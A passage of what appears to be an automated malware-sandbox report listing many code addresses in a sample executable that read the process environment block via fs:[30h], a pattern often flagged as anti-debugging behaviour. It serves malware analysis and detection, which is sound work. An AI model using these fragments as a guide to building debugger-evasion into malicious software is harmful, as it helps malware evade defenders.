          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019E41E8 mov eax, dword ptr fs:[00000030h]3_2_019E41E8
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959100 mov eax, dword ptr fs:[00000030h]3_2_01959100
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959100 mov eax, dword ptr fs:[00000030h]3_2_01959100
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959100 mov eax, dword ptr fs:[00000030h]3_2_01959100
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198513A mov eax, dword ptr fs:[00000030h]3_2_0198513A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198513A mov eax, dword ptr fs:[00000030h]3_2_0198513A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov eax, dword ptr fs:[00000030h]3_2_01974120
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov eax, dword ptr fs:[00000030h]3_2_01974120
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov eax, dword ptr fs:[00000030h]3_2_01974120
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov eax, dword ptr fs:[00000030h]3_2_01974120
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov ecx, dword ptr fs:[00000030h]3_2_01974120
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B944 mov eax, dword ptr fs:[00000030h]3_2_0197B944
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B944 mov eax, dword ptr fs:[00000030h]3_2_0197B944
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B171 mov eax, dword ptr fs:[00000030h]3_2_0195B171
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B171 mov eax, dword ptr fs:[00000030h]3_2_0195B171
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195C962 mov eax, dword ptr fs:[00000030h]3_2_0195C962
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959080 mov eax, dword ptr fs:[00000030h]3_2_01959080
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D3884 mov eax, dword ptr fs:[00000030h]3_2_019D3884
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D3884 mov eax, dword ptr fs:[00000030h]3_2_019D3884
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198F0BF mov ecx, dword ptr fs:[00000030h]3_2_0198F0BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198F0BF mov eax, dword ptr fs:[00000030h]3_2_0198F0BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198F0BF mov eax, dword ptr fs:[00000030h]3_2_0198F0BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019990AF mov eax, dword ptr fs:[00000030h]3_2_019990AF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]3_2_019820A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]3_2_019820A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]3_2_019820A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]3_2_019820A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]3_2_019820A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]3_2_019820A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]3_2_019EB8D0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov ecx, dword ptr fs:[00000030h]3_2_019EB8D0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]3_2_019EB8D0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]3_2_019EB8D0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]3_2_019EB8D0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]3_2_019EB8D0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B8E4 mov eax, dword ptr fs:[00000030h]3_2_0197B8E4
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B8E4 mov eax, dword ptr fs:[00000030h]3_2_0197B8E4
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019540E1 mov eax, dword ptr fs:[00000030h]3_2_019540E1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019540E1 mov eax, dword ptr fs:[00000030h]3_2_019540E1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019540E1 mov eax, dword ptr fs:[00000030h]3_2_019540E1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019558EC mov eax, dword ptr fs:[00000030h]3_2_019558EC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7016 mov eax, dword ptr fs:[00000030h]3_2_019D7016
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7016 mov eax, dword ptr fs:[00000030h]3_2_019D7016
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7016 mov eax, dword ptr fs:[00000030h]3_2_019D7016
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h]3_2_0197A830
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h]3_2_0197A830
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h]3_2_0197A830
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A830 mov eax, dword ptr fs:[00000030h]3_2_0197A830
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]3_2_0198002D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]3_2_0198002D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]3_2_0198002D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]3_2_0198002D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198002D mov eax, dword ptr fs:[00000030h]3_2_0198002D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A24015 mov eax, dword ptr fs:[00000030h]3_2_01A24015
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A24015 mov eax, dword ptr fs:[00000030h]3_2_01A24015
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h]3_2_0196B02A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h]3_2_0196B02A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h]3_2_0196B02A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B02A mov eax, dword ptr fs:[00000030h]3_2_0196B02A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01970050 mov eax, dword ptr fs:[00000030h]3_2_01970050
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01970050 mov eax, dword ptr fs:[00000030h]3_2_01970050
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A12073 mov eax, dword ptr fs:[00000030h]3_2_01A12073
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A21074 mov eax, dword ptr fs:[00000030h]3_2_01A21074
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A25BA5 mov eax, dword ptr fs:[00000030h]3_2_01A25BA5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198B390 mov eax, dword ptr fs:[00000030h]3_2_0198B390
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982397 mov eax, dword ptr fs:[00000030h]3_2_01982397
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01961B8F mov eax, dword ptr fs:[00000030h]3_2_01961B8F
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01961B8F mov eax, dword ptr fs:[00000030h]3_2_01961B8F
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0D380 mov ecx, dword ptr fs:[00000030h]3_2_01A0D380
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1138A mov eax, dword ptr fs:[00000030h]3_2_01A1138A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984BAD mov eax, dword ptr fs:[00000030h]3_2_01984BAD
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984BAD mov eax, dword ptr fs:[00000030h]3_2_01984BAD
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984BAD mov eax, dword ptr fs:[00000030h]3_2_01984BAD
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D53CA mov eax, dword ptr fs:[00000030h]3_2_019D53CA
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D53CA mov eax, dword ptr fs:[00000030h]3_2_019D53CA
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]3_2_019803E2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]3_2_019803E2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]3_2_019803E2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]3_2_019803E2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]3_2_019803E2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019803E2 mov eax, dword ptr fs:[00000030h]3_2_019803E2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197DBE9 mov eax, dword ptr fs:[00000030h]3_2_0197DBE9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A309 mov eax, dword ptr fs:[00000030h]3_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1131B mov eax, dword ptr fs:[00000030h]3_2_01A1131B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195F358 mov eax, dword ptr fs:[00000030h]3_2_0195F358
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195DB40 mov eax, dword ptr fs:[00000030h]3_2_0195DB40
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01983B7A mov eax, dword ptr fs:[00000030h]3_2_01983B7A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01983B7A mov eax, dword ptr fs:[00000030h]3_2_01983B7A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195DB60 mov ecx, dword ptr fs:[00000030h]3_2_0195DB60
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28B58 mov eax, dword ptr fs:[00000030h]3_2_01A28B58
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198D294 mov eax, dword ptr fs:[00000030h]3_2_0198D294
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198D294 mov eax, dword ptr fs:[00000030h]3_2_0198D294
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196AAB0 mov eax, dword ptr fs:[00000030h]3_2_0196AAB0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196AAB0 mov eax, dword ptr fs:[00000030h]3_2_0196AAB0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198FAB0 mov eax, dword ptr fs:[00000030h]3_2_0198FAB0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]3_2_019552A5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]3_2_019552A5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]3_2_019552A5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]3_2_019552A5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019552A5 mov eax, dword ptr fs:[00000030h]3_2_019552A5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982ACB mov eax, dword ptr fs:[00000030h]3_2_01982ACB
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982AE4 mov eax, dword ptr fs:[00000030h]3_2_01982AE4
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]3_2_0195AA16
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]3_2_0195AA16
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01955210 mov eax, dword ptr fs:[00000030h]3_2_01955210
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01955210 mov ecx, dword ptr fs:[00000030h]3_2_01955210
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01955210 mov eax, dword ptr fs:[00000030h]3_2_01955210
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01955210 mov eax, dword ptr fs:[00000030h]3_2_01955210
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01973A1C mov eax, dword ptr fs:[00000030h]3_2_01973A1C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01968A0A mov eax, dword ptr fs:[00000030h]3_2_01968A0A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01994A2C mov eax, dword ptr fs:[00000030h]3_2_01994A2C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01994A2C mov eax, dword ptr fs:[00000030h]3_2_01994A2C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1AA16 mov eax, dword ptr fs:[00000030h]3_2_01A1AA16
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1AA16 mov eax, dword ptr fs:[00000030h]3_2_01A1AA16
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A229 mov eax, dword ptr fs:[00000030h]3_2_0197A229
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0B260 mov eax, dword ptr fs:[00000030h]3_2_01A0B260
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0B260 mov eax, dword ptr fs:[00000030h]3_2_01A0B260
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28A62 mov eax, dword ptr fs:[00000030h]3_2_01A28A62
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019E4257 mov eax, dword ptr fs:[00000030h]3_2_019E4257
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]3_2_01959240
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]3_2_01959240
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]3_2_01959240
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959240 mov eax, dword ptr fs:[00000030h]3_2_01959240
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199927A mov eax, dword ptr fs:[00000030h]3_2_0199927A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1EA55 mov eax, dword ptr fs:[00000030h]3_2_01A1EA55
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198FD9B mov eax, dword ptr fs:[00000030h]3_2_0198FD9B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198FD9B mov eax, dword ptr fs:[00000030h]3_2_0198FD9B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A205AC mov eax, dword ptr fs:[00000030h]3_2_01A205AC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A205AC mov eax, dword ptr fs:[00000030h]3_2_01A205AC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]3_2_01982581
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]3_2_01982581
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]3_2_01982581
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982581 mov eax, dword ptr fs:[00000030h]3_2_01982581
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]3_2_01952D8A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]3_2_01952D8A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]3_2_01952D8A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]3_2_01952D8A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01952D8A mov eax, dword ptr fs:[00000030h]3_2_01952D8A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01981DB5 mov eax, dword ptr fs:[00000030h]3_2_01981DB5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01981DB5 mov eax, dword ptr fs:[00000030h]3_2_01981DB5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01981DB5 mov eax, dword ptr fs:[00000030h]3_2_01981DB5
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019835A1 mov eax, dword ptr fs:[00000030h]3_2_019835A1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]3_2_01A1FDE2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]3_2_01A1FDE2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]3_2_01A1FDE2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1FDE2 mov eax, dword ptr fs:[00000030h]3_2_01A1FDE2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A08DF1 mov eax, dword ptr fs:[00000030h]3_2_01A08DF1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]3_2_019D6DC9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]3_2_019D6DC9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]3_2_019D6DC9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov ecx, dword ptr fs:[00000030h]3_2_019D6DC9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]3_2_019D6DC9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D6DC9 mov eax, dword ptr fs:[00000030h]3_2_019D6DC9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196D5E0 mov eax, dword ptr fs:[00000030h]3_2_0196D5E0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196D5E0 mov eax, dword ptr fs:[00000030h]3_2_0196D5E0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A28D34 mov eax, dword ptr fs:[00000030h]3_2_01A28D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1E539 mov eax, dword ptr fs:[00000030h]3_2_01A1E539
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01963D34 mov eax, dword ptr fs:[00000030h]3_2_01963D34
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984D3B mov eax, dword ptr fs:[00000030h]3_2_01984D3B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984D3B mov eax, dword ptr fs:[00000030h]3_2_01984D3B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01984D3B mov eax, dword ptr fs:[00000030h]3_2_01984D3B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195AD30 mov eax, dword ptr fs:[00000030h]3_2_0195AD30
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019DA537 mov eax, dword ptr fs:[00000030h]3_2_019DA537
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01977D50 mov eax, dword ptr fs:[00000030h]3_2_01977D50
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01993D43 mov eax, dword ptr fs:[00000030h]3_2_01993D43
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D3540 mov eax, dword ptr fs:[00000030h]3_2_019D3540
